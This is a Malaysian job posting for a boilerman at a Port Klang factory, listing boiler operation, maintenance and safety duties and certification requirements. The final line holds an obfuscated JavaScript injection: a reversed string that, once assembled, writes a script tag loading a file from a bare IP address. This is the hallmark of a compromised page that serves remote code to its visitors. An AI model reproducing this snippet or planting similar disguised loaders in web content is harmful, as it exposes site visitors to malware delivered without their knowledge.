Location: Port Klang
Salary : 2.2-2.5k
• Daily recording for all diesel tank
• Assist in preparation and coordinating the steam Boiler Inspection by JKKP.
• Maintain strictly safety and housekeeping practice at all time.
• To operate and maintain existing Boiler in factory according to local regulations.
• Perform service repairs and preventive maintenance to Boiler as required.
• Coordinate with control room to ensure smooth and efficient production line.
• Ensure steam boiler operation in safe condition and compliance to Factory and machinery Act 1967.
• Ensure steam supply and piping system adequate for production process.
• Implement preventive maintenance for Boiler especially in mechanical aspects.
• Must be able to assist in unloading of supplies of diesel or any fuel used for boiler.
• To ensure all required documentations and reports are diligently done every shift
• To assist maintenance crew in any repairs required
• Any other tasks that may be assigned from time to time
• Possess Boilerman operation Grade 1 issued by DOSH
• Able to work on rotating shifts and willing to work long hour
• Experience in biomass boiler (operating & maintaining)
• Knowledge in mechanical engineering would be added advantage. document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))